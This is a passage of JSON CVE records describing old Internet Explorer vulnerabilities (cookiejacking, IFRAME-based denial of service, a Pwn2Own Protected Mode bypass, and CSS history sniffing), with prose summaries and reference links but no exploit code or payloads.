"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2383",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"refsource": "MS",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2383",
"datePublished": "2011-06-03T17:00:00",
"dateReserved": "2011-06-03T00:00:00",
"dateUpdated": "2024-08-06T23:00:33.783Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2382 (GCVE-0-2011-2382)
Vulnerability from cvelistv5 – Published: 2011-06-03 17:00 – Updated: 2024-09-17 02:41- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-06-03T17:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2382",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2382",
"datePublished": "2011-06-03T17:00:00Z",
"dateReserved": "2011-06-03T00:00:00Z",
"dateUpdated": "2024-09-17T02:41:25.100Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-2118 (GCVE-0-2010-2118)
Vulnerability from cvelistv5 – Published: 2010-06-01 20:00 – Updated: 2024-08-07 02:25- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:25:06.342Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-05-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-2118",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://websecurity.com.ua/4238/",
"refsource": "MISC",
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-2118",
"datePublished": "2010-06-01T20:00:00",
"dateReserved": "2010-06-01T00:00:00",
"dateUpdated": "2024-08-07T02:25:06.342Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-1991 (GCVE-0-2010-1991)
Vulnerability from cvelistv5 – Published: 2010-05-20 17:00 – Updated: 2024-08-07 02:17- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:17:13.297Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"name": "20100518 DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-05-18T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://websecurity.com.ua/4206/"
},
{
"name": "20100518 DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-1991",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://websecurity.com.ua/4206/",
"refsource": "MISC",
"url": "http://websecurity.com.ua/4206/"
},
{
"name": "20100518 DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/511327/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-1991",
"datePublished": "2010-05-20T17:00:00",
"dateReserved": "2010-05-20T00:00:00",
"dateUpdated": "2024-08-07T02:17:13.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-1545 (GCVE-0-2012-1545)
Vulnerability from nvd – Published: 2012-03-09 11:00 – Updated: 2024-09-17 02:01- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:01:02.832Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-03-09T11:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1545",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pwn2own.zerodayinitiative.com/status.html",
"refsource": "MISC",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"name": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars",
"refsource": "MISC",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"name": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621",
"refsource": "MISC",
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"name": "http://twitter.com/vupen/statuses/177895844828291073",
"refsource": "MISC",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1545",
"datePublished": "2012-03-09T11:00:00Z",
"dateReserved": "2012-03-09T00:00:00Z",
"dateUpdated": "2024-09-17T02:01:01.177Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-5071 (GCVE-0-2010-5071)
Vulnerability from nvd – Published: 2011-12-07 19:00 – Updated: 2024-09-16 23:31- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T04:09:38.985Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-12-07T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-5071",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-5071",
"datePublished": "2011-12-07T19:00:00Z",
"dateReserved": "2011-12-07T00:00:00Z",
"dateUpdated": "2024-09-16T23:31:42.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2435 (GCVE-0-2002-2435)
Vulnerability from nvd – Published: 2011-12-07 19:00 – Updated: 2024-08-08 04:06
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T04:06:54.637Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-06-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2435",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"name": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777",
"refsource": "MISC",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2435",
"datePublished": "2011-12-07T19:00:00",
"dateReserved": "2011-12-07T00:00:00",
"dateUpdated": "2024-08-08T04:06:54.637Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2383 (GCVE-0-2011-2383)
Vulnerability from nvd – Published: 2011-06-03 17:00 – Updated: 2024-08-06 23:00
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.783Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS",
"x_transferred"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
